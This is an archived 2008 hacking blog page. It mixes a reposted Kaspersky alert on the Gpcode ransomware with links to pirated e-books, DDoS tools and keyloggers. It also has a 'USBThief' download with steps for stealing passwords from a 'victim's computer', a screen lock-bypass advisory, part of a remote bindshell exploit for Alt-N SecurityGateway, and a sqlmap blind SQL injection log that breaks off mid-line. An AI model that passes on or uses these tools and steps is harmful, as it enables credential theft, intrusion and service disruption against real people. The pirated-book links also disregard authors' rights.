guru of networks: 2008

Tuesday, July 8, 2008

Wednesday, July 2, 2008

Virus.Win32.Gpcode.ak

Status : moderate risk

Kaspersky Lab has detected a new version of the ‘malicious blackmailer’ Gpcode - Virus.Win32.Gpcode.ak.

The new Gpcode variant encrypts files with extensions DOC, TXT, PDF, XLS, JPG, PNG, CPP, H etc. on hard drives using an RSA algorithm with a 1024-bit key.

After encrypting files, the virus leaves a text file in the folder next to the encrypted files with following message:

Your files are encrypted with RSA-1024 algorithm.
To recovery your files you need to buy our decryptor.
To buy decrypting tool contact us at: ********@yahoo.com

Currently, we detect the new variant, but we are unable to crack the 1024-bit key. Our analysts are continuing to work on both the key and the virus to resolve this issue.

Kaspersky Lab recommends that all Internet users enable maximum protection from malicious code and network attacks on their computers, refrain from executing suspicious programs received from untrustworthy sources and back up any important information on their computers.

Detection of Virus.Win32.Gpcode.ak was added to Kaspersky Anti-Virus signature databases yesterday, on June 4th, at 15:39 GMT. Please make sure to update if you haven’t already.

If you have fallen victim to Gpcode.ak, try to contact us using another computer connected to the Internet. DO NOT RESTART or POWER DOWN the potentially infected machine. Contact us by email stopgpcode@kaspersky.com and tell us the exact date and time of infection, as well everything you did on the computer in the 5 minutes before the machine was infected: which programs you have executed, which websites you have visited, etc. We'll try and help you recover any data that has been encrypted.

Monday, June 30, 2008

lots of e-books and tuts

BLUETOOTH
Blue Tooth Security | http://rapidshare.com/files/80571135/Bluetooth_Security.pdf

CRACKING

CRYPTOGRAPHY
An Introduction to Cryptography | http://rapidshare.com/files/80521228/An_Introduction_to_Cryptography.pdf
Cryptography's Role n Securing The Information Society | http://rapidshare.com/files/80521293/Cryptography_s_Role_n_Securing_The_Information_Society.pdf

HACKING
Defeating Encryption | http://rapidshare.com/files/80521187/Defeating_Encryption.pdf
How To Make Keygens | http://rapidshare.com/files/80521297/E-Book_-_How_To_Make_Keygens.pdf
Hacker's book Common Ways to Attack | http://rapidshare.com/files/80521308/www-hackersbook-com_chapter_common-ways-to-attack.pdf
Hacking For Dummies 1 | http://rapidshare.com/files/80521937/Hacking_For_Dummies_1.pdf
Hacking For Dummies 2 | http://rapidshare.com/files/80521984/Hacking_For_Dummies_2.pdf
Hacking into computer systems - a beginners guide | http://rapidshare.com/files/80522046/Hacking_into_computer_systems_-_a_beginners_guide.pdf
Hacking Windows XP | http://rapidshare.com/files/80522644/John.Wiley.and.Sons.Hacking.Windows.XP.Jul.2004.eBook-DDU.pdf
The Art Of Exploitation | http://rapidshare.com/files/80522872/No.Starch.Press.Hacking.The.Art.Of.Exploitation.eBook-LiB.chm
Syngress Buffer Overflow Attacks | http://rapidshare.com/files/80523456/Syngress.Buffer.Overflow.Attacks.Dec.2004.eBook-DDU.pdf
Wiley Reversing Secrets of Reverse Engineering | http://rapidshare.com/files/80523920/Wiley.Reversing.Secrets.of.Reverse.Engineering.Apr.2005.eBook-DDU.pdf
Hack - Discovery Nmap | http://rapidshare.com/files/80525146/Ebook_-_Hack_-_Discovery_Nmap.pdf
Pocket Hack Master Users Guide | http://rapidshare.com/files/80529070/Pocket_Hack_Master_Users_Guide.pdf
Learn to hack in easy steps | http://rapidshare.com/files/80537215/_ebook_computing__Learn_to_hack_in_easy_steps.pdf
Hacking - Firewalls And Networks How To Hack Into a Remote Computers | http://rapidshare.com/files/80574003/Hacking_-_Firewalls_And_Networks_How_To_Hack_Into_a_Remote_Computers.pdf

HARDWARE
Cable Modem Hack walk through | http://rapidshare.com/files/80525141/cable_modem_hack_walkthrough.pdf

NETWORKING
Cisco TCP-IP Routing Professional Reference | http://rapidshare.com/files/80527872/McGraw-Hill_Cisco_TCP-IP_Routing_Professional_Reference.pdf
Network Concepts | http://rapidshare.com/files/80527897/networkconcepts.pdf
Networking 4 | http://rapidshare.com/files/80527904/Networking4.pdf
Networking Protocol Suites | http://rapidshare.com/files/80528530/Networking_Protocol_Suites.pdf
Networking Bible | http://rapidshare.com/files/80528882/Networking.Bible.pdf
OReilly - Virtual Private Networks, Second Edition | http://rapidshare.com/files/80528971/OReilly_-_Virtual_Private_Networks__Second_Edition.pdf
Sybex, Network+ Study Guide | http://rapidshare.com/files/80529700/Sybex__Network__Study_Guide__2005___4Ed_DDU_LotB.pdf
The Encyclopedia of Networking 2 Edition | http://rapidshare.com/files/80530506/The_Encyclopedia_of_Networking_2._Edition.pdf
TS--Disable.Internet | http://rapidshare.com/files/80530511/TS--Disable.Internet.pdf
Network Security A Beginners Guide | http://rapidshare.com/files/80558286/Network.Security.A_Beginners.Guide.rar
Data Servers, Networking, and Security | http://rapidshare.com/files/80563702/C_R_S_N.pdf
Data Networks | http://rapidshare.com/files/80566896/D_N_I_P.pdf
Wireless Communications and Networking | http://rapidshare.com/files/80567752/W_C_N.pdf
Network Programming for Mcft Windows - Second Edition | http://rapidshare.com/files/80570918/Mcft-_Second_Edition_-_Caudex.chm

SECURITY
Hacker's book Identifying Attackers | http://rapidshare.com/files/80521327/www-hackersbook-com_chapter_identifying-attackers.pdf
Hack Attacks Revealed | http://rapidshare.com/files/80521836/Hack_Attacks_Revealed.pdf
Hackers Secrets | http://rapidshare.com/files/80521881/Hackers_Secrets.pdf
Maximum Security - A Hacker's Guide to Protecting Your Inter | http://rapidshare.com/files/80522774/Maximum_Security_-_A_Hacker_s_Guide_to_Protecting_Your_Inter.pdf
Hack Proofing - Your Network - Internet Tradecraft | http://rapidshare.com/files/80525311/Hack_Proofing_-_Your_Network_-_Internet_Tradecraft.pdf
Hack Proofing Your Wireless Network | http://rapidshare.com/files/80525674/Hack_Proofing_Your_Wireless_Network.pdf
Hacking Exposed Network Security Secrets & Solutions, Third | http://rapidshare.com/files/80525820/Hacking_Exposed_Network_Security_Secrets___Solutions__Third_.pdf
Hacking Exposed- Web Applications | http://rapidshare.com/files/80530894/Hacking_Exposed-_Web_Applications__MCGraw-Hill-2002_.pdf
Cross Site Scripting Detection and Prevention | http://rapidshare.com/files/80534573/Cross_site_scripting_detection_and_prevention.pdf
Hack IT Security Through Penetration Testing | http://rapidshare.com/files/80535490/Hack_IT_Security_Through_Penetration_Testing.pdf
Hacker Secret Book | http://rapidshare.com/files/80535523/Hacker_Secret_Book.pdf
Hackerland | http://rapidshare.com/files/80535553/Hackerland.pdf
Hacker's Encyclopedia | http://rapidshare.com/files/80535564/Hacker_s_Encyclopedia.txt
Hacking Exposed | http://rapidshare.com/files/80536064/Hacking_Exposed.pdf
HACKKIT | http://rapidshare.com/files/80536092/HACKKIT.TXT
Hugo Cornwall - The Hacker's Handbook | http://rapidshare.com/files/80536117/Hugo_Cornwall_-_The_Hacker_s_Handbook_.pdf
ICMP Scanning v2.0 | http://rapidshare.com/files/80536148/ICMP_Scanning_v2.0.pdf
IIS_Security_and_Programming_Countermeasures | http://rapidshare.com/files/80536371/IIS_Security_and_Programming_Countermeasures.pdf
Improve by Breaking | http://rapidshare.com/files/80536377/improve_by_breakin.txt
Maximum Security | http://rapidshare.com/files/80536559/Maximum_Security.pdf
Network - The Hacker Crackdown | http://rapidshare.com/files/80536598/Network_-_The_Hacker_Crackdown.pdf
PC TIPS & TRICKS - Hacker Bible | http://rapidshare.com/files/80536612/PC_TIPS___TRICKS_-_Hacker_Bibel_2000_.pdf
Practical Stealth Portscan Discovery | http://rapidshare.com/files/80536625/Practical_Stealth_Portscan_Discovery_-_spice-ccs2000.pdf
Practical-SEH-exploitation | http://rapidshare.com/files/80536685/Practical-SEH-exploitation.pdf
Hall PTR Internet Denial of Service Attack and Defense Mechanisms | http://rapidshare.com/files/80536799/Prentice_1_.Hall.PTR.Internet.Denial.of.Service.Attack.and.Defense.Mechanisms.eBook-DDU.zip
Router Security Guidance Activity | http://rapidshare.com/files/80536939/Router_Security_Guidance_Activity.pdf
XML_Secuirty | http://rapidshare.com/files/80537208/XML_Secuirty.pdf
100 Ways To Disappear | http://rapidshare.com/files/80537236/100_Ways_To_Disappear.doc
Hack IT Security Through Penetration Testing | http://rapidshare.com/files/80537514/Addison.Wesley-Hack.I.T.Security.Through.Penetration.Testing-2002.chm
Computer Vulnerabilities | http://rapidshare.com/files/80537550/Computer_Vulnerabilities.pdf
Configuring Windows 2000 Server Security | http://rapidshare.com/files/80537787/Configuring_Windows_2000_Server_Security.pdf
Hacker Web Exploitation Uncovered | http://rapidshare.com/files/80552331/Hacker.Web.Exploitation.Uncovered-fusion89_waushare.rar
A Plus Network Plus Security Plus Exams in A Nutshell | http://rapidshare.com/files/80557304/A_Plus_Network_Plus_Security_Plus_Exams_in_A_Nutshell.pdf
Handbook of Database Security | http://rapidshare.com/files/80561473/Handbook.of.Database.Security.0387485325.rar
The International Handbook of Computer Security | http://rapidshare.com/files/80562155/The.International.Handbook.of.Computer.Security.eBook-EEn.pdf
Auerbach Information Security Management Handbook 6th Edition | http://rapidshare.com/files/80566300/Auerbach.Information.Security.Management.Handbook.6th.Edition-BBL.rar
Router Security | http://rapidshare.com/files/80571279/Router_Security_Guidance_Activity.pdf
Firewall Book | http://rapidshare.com/files/80572125/Juniper_Firewall_Book.pdf
Building Internet Firewalls | http://rapidshare.com/files/80572698/Building_Internet_Firewalls_2nd_Edition_eBooK.pdf

LINUX
Understanding the LINUX Kernel | http://rapidshare.com/files/80520345/O_Reilly_-_Understanding_The_Linux_Kernel.pdf
O'Reilly Linux In A Nutshell, 4th Edition | http://rapidshare.com/files/80524025/O_Reilly_--_Linux_In_A_Nutshell__4th_Edition.chm
Sams Linux Shell Scripting with Bash | http://rapidshare.com/files/80524406/Sams.Linux.Shell.Scripting.with.Bash.eBook-LinG.pdf
Hacking Red Hat Kickstart | http://rapidshare.com/files/80524412/Hacking_Red_Hat_Kickstart.pdf
Linux From Scratch | http://rapidshare.com/files/80524467/Linux_From_Scratch.pdf
How Linux Works What Every Super User Should Know | http://rapidshare.com/files/80525139/No.Starch.Press.How.Linux.Works.What.Every.Super.User.Should.Know.eBook-LiB.chm
Linux Networking Bible | http://rapidshare.com/files/80526912/Linux_Networking_Bible.pdf
Red Hat Linux | http://rapidshare.com/files/80531297/R_H_L.pdf
Linux Complete Command Reference | http://rapidshare.com/files/80531851/Linux_Complete_Command_Reference-0672311046.pdf
Linux Network Servers | http://rapidshare.com/files/80532189/Linux.Network.Servers.pdf
Hardening Linux | http://rapidshare.com/files/80532688/Hardening_Linux.chm
The Linux Networking Architecture Design and Implementation of Network
inux_Shell_Scripting_Tutorial | http://rapidshare.com/files/80549460/Linux_Shell_Scripting_Tutorial.posted_at_eselfilme.de.pdf
Fedora Linux | http://rapidshare.com/files/80553910/Fedora.Linux.Oct.2006.rar
Linux For Dummies 7th Edition | http://rapidshare.com/files/80563973/Linux.For.Dummies.7th.Edition.May.2006.rar

UNIX
UNIX Hints & Hacks | http://rapidshare.com/files/80550133/UNIX_Hints___Hacks.pdf
Unix Commands | http://rapidshare.com/files/80550137/Unix_Commands.pdf
Unixguide | http://rapidshare.com/files/80550141/unixguide.pdf
Unix-power-tools | http://rapidshare.com/files/80550891/unix-power-tools.pdf

PROGRAMING
GENERAL
Writing security tools and exploits | http://rapidshare.com/files/80562045/writing-security-tools-and-exploits.9781597499972.23482.pdf
Coding Secure Code | http://rapidshare.com/files/80562700/Code_Sec.pdf

ASM
Assembler Intel Code Table | http://rapidshare.com/files/80541077/Assembler_Intel_Code_Table.pdf

ASP

C/C++
ANSI-ISO C++ Professional Programmer's Handbook | http://rapidshare.com/files/80541154/ANSI-ISO_C___Professional_Programmer_s_Handbook.pdf
C in 21 Days | http://rapidshare.com/files/80541336/C_in_21_Days.pdf
C Programming | http://rapidshare.com/files/80541454/C_Programming.PDF
C++ Programming HOW-TO v40 | http://rapidshare.com/files/80541477/C___Programming_HOW-TO_v40.3.pdf
C++ | http://rapidshare.com/files/80541709/C__.pdf
CPP | http://rapidshare.com/files/80541753/cpp_einfuehrung.pdf
Object-Oriented System Development | http://rapidshare.com/files/80541952/Object-Oriented_System_Development.pdf
Thinking in C++ Volume1 | http://rapidshare.com/files/80542096/Thinking_in_C___Volume1.pdf
Visual C++ for Dummies Quick Reference | http://rapidshare.com/files/80542657/Visual_C___for_Dummies_Quick_Reference.pdf
C++ Standard Library | http://rapidshare.com/files/80564172/tc__sl.rar

C#
Pro C# 2008 and the NET 3.5 Platform Fourth Edition | http://rapidshare.com/files/80573838/Pro_C__2008_and_the_NET_3.5_Platform_Fourth_Edition.pdf

COBRA
CORBA Firewall Security | http://rapidshare.com/files/80542859/CORBA_Firewall_Security.pdf
CORBA on the Internet | http://rapidshare.com/files/80542962/CORBA_on_the_Internet_-_0iona.pdf
CORBA Proxy | http://rapidshare.com/files/80542980/CORBA_Proxy.pdf
DOCsec3 | http://rapidshare.com/files/80542987/DOCsec3.ppt
Domain Boundary Controller | http://rapidshare.com/files/80543001/Domain_Boundary_Controller_-_Xtradyne.pdf
Firewalls - OSE Remote | http://rapidshare.com/files/80543043/Firewalls_-_OSE_Remote.pdf
Java RMI, CORBA und Firewalls | http://rapidshare.com/files/80543047/Java_RMI__CORBA_und_Firewalls.pdf
NAI-Labs-Intrusion Tolerant CORBA | http://rapidshare.com/files/80543056/NAI-Labs-Intrusion_Tolerant_CORBA.pdf
OrbixWeb | http://rapidshare.com/files/80543082/OrbixWeb1.ppt
RMI CORBA und Firewalls | http://rapidshare.com/files/80543092/RMI_CORBA_und_Firewalls.pdf
Seitz - Generic Proxy Platform for CORBA Applications | http://rapidshare.com/files/80543097/Seitz_-_Generic_Proxy_Platform_for_CORBA_Applications.pdf
Status of the CORBA Firewall | http://rapidshare.com/files/80543105/Status_of_the_CORBA_Firewall.pdf
Teach Yourself CORBA In 14 Days | http://rapidshare.com/files/80543199/Teach_Yourself_CORBA_In_14_Days.pdf

CGI
CGI Developer's Guide | http://rapidshare.com/files/80545793/CGI_Developer_s_Guide.pdf
CGI for Commerce | http://rapidshare.com/files/80545890/CGI_for_Commerce.pdf

Java
Creating Web Applets with Java | http://rapidshare.com/files/80543256/Creating_Web_Applets_with_Java.pdf
Java CGI How To | http://rapidshare.com/files/80543266/Java_CGI_How_To.pdf
Javadoc | http://rapidshare.com/files/80543288/javadoc.pdf
Learning Java with JBuilder | http://rapidshare.com/files/80543535/Learning_Java_with_JBuilder.pdf
Teach Yourself Java In 21 Days | http://rapidshare.com/files/80543868/Teach_Yourself_Java_In_21_Days.pdf
Thinking in Java | http://rapidshare.com/files/80544055/Thinking_in_Java.pdf
Data Structures | http://rapidshare.com/files/80571064/Dat_Struc.pdf

Javascript

Perl
Advanced Perl Programming | http://rapidshare.com/files/80545690/Advanced_Perl_Programming.pdf
Learning Perl on Win32 Systems | http://rapidshare.com/files/80546153/Learning_Perl_on_Win32_Systems.pdf
Learning Perl | http://rapidshare.com/files/80546405/Learning_Perl.pdf
network-programming-with-perl-(slides) | http://rapidshare.com/files/80546447/network-programming-with-perl-_slides__.pdf
Perl 5 by exemple | http://rapidshare.com/files/80546631/Perl_5_by_exemple_-_ebook.pdf
Perl Cookbook | http://rapidshare.com/files/80547165/Perl_Cookbook.pdf
Perl in a nutshell | http://rapidshare.com/files/80548599/perl_in_a_nutshell.pdf
Programming Perl | http://rapidshare.com/files/80549230/Programming_Perl.pdf
Teach Yourself Perl in 21 Days | http://rapidshare.com/files/80549451/Teach_Yourself_Perl_in_21_Days.pdf

Delphi

Shell
Shell Programming in 24 hours | http://rapidshare.com/files/80549646/shell_programming_in_24_hours.pdf
Windows Shell Script Programming For The Absolute Beginner | http://rapidshare.com/files/80562384/Windows_Shell_Script_Programming_For_The_Absolute_Beginner_-_Premier_Press.chm

PHP
Learn PHP in 24 Hours | http://rapidshare.com/files/80520584/SAMS_Teach_Yourself_PHP4_in_24_Hours.pdf
Premier Press - PHP.MySQL Programming for the Absolute Beginner | http://rapidshare.com/files/80533486/Premier_Press_-_PHP.MySQL_Programming_for_the_Absolute_Beginner.chm

SQL/MySQL
New Riders - MySQL and Perl for the Web | http://rapidshare.com/files/80549713/New_Riders_-_MySQL_and_Perl_for_the_Web.chm
McGraw Hill Mcft SQL Server 2005 The Complete Reference | http://rapidshare.com/files/80553526/McGraw.Hill.Mcft.SQL.Server.2005.The.Complete.Reference.rar

Oracle
Oracle 9i - Application Developer's Guide - Fundamentals | http://rapidshare.com/files/80544288/Oracle_9i_-_Application_Developer_s_Guide_-_Fundamentals.pdf
Oracle 9i - Application Developer's Guide - Object Relational Features | http://rapidshare.com/files/80544388/Oracle_9i_-_Application_Developer_s_Guide_-_Object_Relational_Features.pdf
Oracle 9i - designer overview | http://rapidshare.com/files/80544430/Oracle_9i_-_designer_overview.pdf
Oracle 9i - form server best practices | http://rapidshare.com/files/80544445/Oracle_9i_-_form_server_best_practices_.pdf
Oracle 9i - Forms technical overview | http://rapidshare.com/files/80545024/Oracle_9i_-_Forms_technical_overview.pdf
Teach Yourself Oracle 8 In 21 Days | http://rapidshare.com/files/80545132/Teach_Yourself_Oracle_8_In_21_Days.pdf
Using Oracle8 | http://rapidshare.com/files/80545343/Using_Oracle8.pdf

Pascal
Pascal Programming | http://rapidshare.com/files/80545419/Pascal_Programming.pdf

==============================================================================================================

Download the following 15 Books in this post: (92.5 MB)

http://rapidshare.com/files/78417045/Javascript_AJAX_1.rar

[Apress] Beginning JavaScript with DOM Scripting and Ajax From Novice to Professional (2006).pdf
[Apress] Pro JavaScript Techniques (2006).pdf
[Manning] Ajax in Action (2005).pdf
[No Starch] The Book of JavaScript (2006).pdf
[O'Reilly] Head Rush Ajax (2006).chm
[O'Reilly] JavaScript, The Definitive Guide (2006).chm
[O'Reilly] Learning JavaScript (2006).chm
[Peachpit] JavaScript and Ajax for the Web (2006).chm
[Prentice Hall] PTR Understanding AJAX Using JavaScript to Create Rich Internet Applications (2006).chm
[SitePoint] Modern Web Design Using JavaScript and DOM (2005).pdf
[SitePoint] Simply JavaScript (2007).pdf
[SitePoint] The JavaScript Anthology, 101 Essential Tips, Tricks & Hacks (2006).pdf
[Wiley & Sons] Ajax Bible (2007).chm
[Wrox] Beginning JavaScript (2007).pdf
[Wrox] Professional JavaScript For Web Developers (2005).pdf

[SitePoint] Simply JavaScript (2007)
11.3 MB

Image

Book Description
Everything you need to learn JavaScript from Scratch!

Packed with full-color examples, Simply JavaScript is a step-by-step introduction to programming in JavaScript the right way. Learn how easy it is to use JavaScript to solve real-world problems, build smarter forms, track user events (such as mouse clicks and key strokes), and design eye-catching animations. Then move into more powerful techniques using the DOM and Ajax.

* Learn JavaScript's built-in functions, methods, and properties.
* Easily integrate JavaScript in your web site.
* Use JavaScript to validate form entries and interact with your users.
* Understand how to respond to user events.
* Create animations that bring your web site to life.
* Start programming using the DOM and Ajax.

Unlike other JavaScript books, modern best practices such as progressive enhancement, accessibility and unobtrusive scripting are used from the very beginning. All the code in the book is also cross-browser compatible and downloadable for free, so you can get started instantly!

Download:

http://mihd.net/hjy2u9

[Wrox] Beginning JavaScript (2007)
12.7 MB

Image

Book Description
Suitable for learning basic programming for Web browsers, Beginning JavaScript is a patient, introductory tutorial on writing scripts successfully. It teaches you how to create client-side scripts (including full coverage of fundamentals like variables and flow control, plus plenty of screen shots.)

JavaScript is a good way to learn programming. It's powerful, of course, but the book takes small steps, using scripts that work with string and time data first, and then moving to manipulating browser objects like forms and windows. A running case study for a trivia game helps anchor the steps with a practical (and fun) example. There are plenty of tips on debugging your scripts (including how to use the M!crosoft Script Debugger tool), and each section includes sample questions. (The book also offers extensive answers in over 80 pages at the end of the book.)

There's plenty of material on the differences between Internet Explorer and Netscape, especially when it comes to Dynamic HTML (DHTML). Coverage of the Document Object Model (DOM) for browsers helps bring the text up to date on some of the latest standards in Web browsers (including the new Netscape 6).

While the focus of Beginning JavaScript clearly is on the client, later sections turn to server-side ASP development (in which the sample trivia game is enhanced with ASPs written in JavaScript using ADO and M!crosoft Access.) Reference sections on JavaScript and the browser object model for Internet Explorer and Netscape (through version 4.x) round out the material.

In all, with its approachable style and clearly rendered code examples, Beginning JavaScript makes for a worthwhile first book of programming for today's browsers. Even if you haven't programmed before, this text can give you the tools you need to bring your static Web pages to life.

Download:

http://mihd.net/wbf7ks

[O'Reilly] Learning JavaScript (2006)
1.57 MB

Image

Book Description
As web browsers have become more capable and standards compliant, JavaScript has grown in prominence. JavaScript lets designers add sparkle and life to web pages, while more complex JavaScript has led to the rise of Ajax -- the latest rage in web development that allows developers to create powerful and more responsive applications in the browser window.

Learning JavaScript introduces this powerful scripting language to web designers and developers in easy-to-understand terms. Using the latest examples from modern browser development practices, this book teaches you how to integrate the language with the browser environment, and how to practice proper coding techniques for standards-compliant web sites. By the end of the book, you'll be able to use all of the JavaScript language and many of the object models provided by web browsers, and you'll even be able to create a basic Ajax application.

Download:

http://mihd.net/39zlgn

[O'Reilly] JavaScript, The Definitive Guide (2006)
2.22 MB

Image

Book Description
This Fifth Edition is completely revised and expanded to cover JavaScript as it is used in today's Web 2.0 applications. This book is both an example-driven programmer's guide and a keep-on-your-desk reference, with new chapters that explain everything you need to know to get the most out of JavaScript, including:

* Scripted HTTP and Ajax
* XML processing
* Client-side graphics using the

33 ddos tools

: http://myfreefilehosting.com/f/567c176d70_3.18mb

Sunday, June 29, 2008

Keyloggers

Keyloggers
-+- Dkey 2006 KEYLOGER - http://h4ck-y0u.org/viewtopic.php?t=11575
-+- Advanced Invisible Keyloger 1.5 - http://h4ck-y0u.org/viewtopic.php?t=26247
-+- Ardamax Keylogger - http://h4ck-y0u.org/viewtopic.php?t=32529
-+- Digital Keylogger Pro by Nytro - http://h4ck-y0u.org/viewtopic.php?t=35621
-+- Perfect keylogger - http://h4ck-y0u.org/viewtopic.php?t=31377
-+- Spytecor Keylogger 1.3.5 - http://h4ck-y0u.org/viewtopic.php?t=32637
-+- Spytech - Keystroke Spy v1.10 - http://h4ck-y0u.org/viewtopic.php?t=35589
-+- Ghost Keylogger 3.80 - http://h4ck-y0u.org/viewtopic.php?t=30091
-+- EliteLog 1.9 - http://h4ck-y0u.org/viewtopic.php?t=29674
-+- Golden Keylogger 1.32 - http://h4ck-y0u.org/viewtopic.php?t=4623

Saturday, June 21, 2008

screen 4.0.3 loacal Authentication Bypass

Author: Rembrandt
Affected Software: screen <= 4.0.3
Affected OS : OpenBSD (any up to current (wich will become oBSD 4.4))
Type: Local
Type: Authentication Bypass

screen is vulnerable to a authentication bypass which allows local attackers
to gain system access in case screen was locked with a password.

It has been tested on OpenBSD + screen 4.0.3 on x86/amd64.
But during the nature of the behavior of screen and OpenBSD it should be
architecture/version indipendent for now.

How to check this?

Lock screen using ctrl+x
Choose a Password
Confirm the Password

Screen asks for a Password to unlock the screen.
Just press ctrl+c and if you like screen-x to reattach the screen-session.

Example:

$ testscreen
/bin/ksh: testscreen: not found
$
Key:
Again:
Screen used by rembrandt .
Password:
$ screen -x
There are several suitable screens on:
29602.ttyC0.raven (Attached)
25144.ttyC1.raven (Detached)
Type "screen [-d] -r [pid.]tty.host" to resume one of them.
$ screen -x 25144
$ testscreen
/bin/ksh: testscreen: not found
$

Because of the nature of a locked screen you wont be able to lock your shell.
screen will never ask you for a password.

Of course this works also if you get access to a SSH wich has a locked
screen running. So in case you have locked your screen session wich contains
a open SSH session to a host where you also have a locked screen session
you might have no password protection at all in case all systems are OpenBSD.
That is just another example. Importent for you should be the combination of
screen and OpenBSD.

Do not claim it does not work because you just tested this against the latest
Linux/Solaris/Whatever.

It is known to work and I mentioned the OS.
Still it is known that it worked against some scarry Linux distributions
wich are not realy common.

All security websites wich do report this is a fake may consider to update their
reports except of simply claiming wrong things.

Alt-N SecurityGateway v1.00-1.01

* ----------------------------------------
* Target : Alt-N SecurityGateway v1.00-1.01
* ----------------------------------------
* Exploit : Alt-N SecurityGateway v1.00-1.01 Remote Stack Overflow Exploit
* Exploit date : 11.06.2008-14.06.2008
* Exploit writer : Heretic2 (heretic2x@gmail.com)
* OS : Windows ALL
* Crew : Dreatica-FXP
* ----------------------------------------
* Details : Obtain the overflow and crash the application is peace a cake job.
* To make a wroking code execution here is a hell. First we can see that
* the username before overflow the buffer pass through some functions,
* that changes and restrict some useful chars. Firstly the beffer gets
* lowered so the overflow should not contain upper chars :( . So i decided
* to use some encoders for the payload like nonupper and non alpha from MSF.
* The nonupper use the `@` (0x40) char which the app doesn't eat at all.
* The nonalpha encoder in decoder code and the generated body contained
* always the 0xC0, 0xC1, 0x80, 0x81 which were translated to 0xE0, 0xE1,
* 0x90, 0x91. Don't know, may be this chars translation was due to my russian locale.
* After few days of work i have comed with the required bindshell which bypass
* all restricted chars and executes. Thx to skylined, for his alpha tool.
* Bad chars : 0x00 0x40 0x41 0x42 0x43 0x44 0x45 0x46 0x47 0x48 0x49 0x4A 0x4B 0x4C 0x4D 0x4E
* 0x4F 0x50 0x51 0x52 0x53 0x54 0x55 0x56 0x57 0x58 0x59 0x5A 0x40 0x7b 0xAA 0xC0
* 0xC1 0xC2 0x80 0x81
* ----------------------------------------
* Thanks to:
* 1. securfrog ( )
* 2. ALPHA 2: Zero-tolerance ( )
* 3. The Metasploit project ( http://metasploit.com )
* 4. Dreatica-FXP crew ( http://www.dreatica-fxp.com )
************************************************************************************
* This was written for educational purpose only. Use it at your own risk. Author will be not be
* responsible for any damage, caused by that code.
*/

#include
#include
#include
#include
#include

#pragma comment(lib,"ws2_32")

void usage(char * s);
void logo();
void end_logo();
void print_info_banner_line(const char * key, const char * val);

void extract_ip_and_port( char * &remotehost, int * port, char * str);
int fill_payload_args(int sh, int bport, char * reverseip, int reverseport, struct h2readyp * xx);

int hr2_connect(char * remotehost, int port, int timeout);
int hr2_udpconnect(char * remotehost, int port, struct sockaddr_in * addr, int timeout);
int hr2_updsend(char * remotehost, unsigned char * buf, unsigned int len, int port, struct sockaddr_in * addr, int timeout);
int execute(struct _buf * abuf, char * remotehost, int port);

struct _buf
{
unsigned char * ptr;
unsigned int size;
};
int construct_shellcode(int sh, struct _buf * shf, int target);
int construct_buffer(struct _buf * shf, int target, struct _buf * abuf);

Friday, June 20, 2008

USB Steals Pc Passwords
Tweaked USB that steals every passwords including licences.

Decompress the archive and put all the files located in the folder "USBThief"into a USB.
(You MUST put all from USBThief directory in main directory of usb, no folders no anything, just simply c/p ...)
Insert the USB in your victim's computer
View folder "dump" to see all passwords

Requirements:
No special!

Size:

1935 KB

Download:
Code:

http://rapidshare.com/files/99418536/USBThief.rar

Pass:
Code:

www.ultimate-caffe.org

USB Steals

This movie demonstrates how software vulnerabilities are exploited. It might also help penetration testers / ethical hackers to understand what is needed to write reliable exploits.

http://www.youtube.com/watch?v=jAX504trWZU&feature=related

Exploiting Software Vulnerabilities - A case study

Optimized Blind SQL Injection

Blind sql injection is a technique that let hackers retrieve database data through a sql injection that doesn't give out useful information through web application errors.

Security by obscurity is not security though. Sqlmap and Absinthe demonstrate this clearly. They are capable of getting you the whole database even if no error is shown when user inputs characters meant to
trigger an sql error.

So how is it possible to still get database data without triggering web application errors?
These tools basically work on a true/false base. They provide the web app with input known to be faulty to trigger a FALSE case and input known to be working to trigger a TRUE case.

Using a TRUE/FALSE condition a loop through the charset is undertaken to recover a string in the database one character at a time. Usually the SUBSTRING/CONCAT sql commands are used to match a correct guess with the TRUE case.

The problem with this approach is the time it takes to retrieve data from the database.
Most of the tools for blind sql injection are not optimized.
Recently I came across with a nice research from Secforce.

They have written a quick tool to optimize the task of dumping a database through a blind sql injection.

The tool, written in python is basically a shell.
You provide parameters like vulnerable web page and then it will retrieve the desired portion of database (table names, column names or full data), nothing different from all the other sql injection tools.

What makes this tool better than the others (for blind sqli) is its speed thanks to the optimizations used to find characters.
You can read more about the implemented optimizations here.
From a test I personally undergone I noticed that sqlmap is the tool that is best (together with secforce blind sql injection tool) at dumping data through blind sql injection.

Here's the dump from the console of an injection process using sqlmap:

C:\hack\SQL\sqlmap>sqlmap.py --url="http://localhost/vuln.asp?i=6" -p i -v 3 -b --string="Ciao"

sqlmap/0.6-rc5 coded by inquis
and belch

[14:33:38] [DEBUG] request:http://localhost/vuln.asp?i=6
[14:33:43] [INFO] testing if GET parameter 'i' is dynamic
[14:33:43] [DEBUG] request:http://localhost/vuln.asp?i=47
[14:33:46] [INFO] confirming that GET parameter 'i' is dynamic
[14:33:46] [DEBUG] request:http://localhost/vuln.asp?i='NoValue

[14:33:48] [DEBUG] request:http://localhost/vuln.asp?i="NoValue

[14:33:50] [INFO] GET parameter 'i' is dynamic
[14:33:50] [INFO] testing sql injection on GET parameter 'i'
[14:33:50] [INFO] testing numeric/unescaped injection on GET parameter 'i'

[14:33:50] [DEBUG] request:http://localhost/vuln.asp?i=6 AND 3=
3
[14:33:52] [DEBUG] request:http://localhost/vuln.asp?i=6 AND 3=
4
[14:33:55] [INFO] confirming numeric/unescaped injection on GET parameter 'brand
id'
[14:33:55] [DEBUG] request:http://localhost/vuln.asp?i=6 AND No
Value
[14:33:57] [INFO] GET parameter 'i' is numeric/unescaped injectable
[14:33:57] [INFO] testing MySQL
[14:33:57] [INFO] query: CONCAT('6', '6')
[14:33:57] [DEBUG] request:http://localhost/vuln.asp?i=6 AND OR
D(MID((CONCAT(CHAR(54), CHAR(54))), 1, 1)) > 63
[14:33:58] [DEBUG] request:http://localhost/vuln.asp?i=6 AND OR
D(MID((CONCAT(CHAR(54), CHAR(54))), 1, 1)) > 31
[14:34:00] [DEBUG] request:http://localhost/vuln.asp?i=6 AND OR
D(MID((CONCAT(CHAR(54), CHAR(54))), 1, 1)) > 15
[14:34:03] [DEBUG] request:http://localhost/vuln.asp?i=6 AND OR
D(MID((CONCAT(CHAR(54), CHAR(54))), 1, 1)) > 7
[14:34:05] [DEBUG] request:http://localhost/vuln.asp?i=6 AND OR
D(MID((CONCAT(CHAR(54), CHAR(54))), 1, 1)) > 3
[14:34:07] [DEBUG] request:http://localhost/vuln.asp?i=6 AND OR
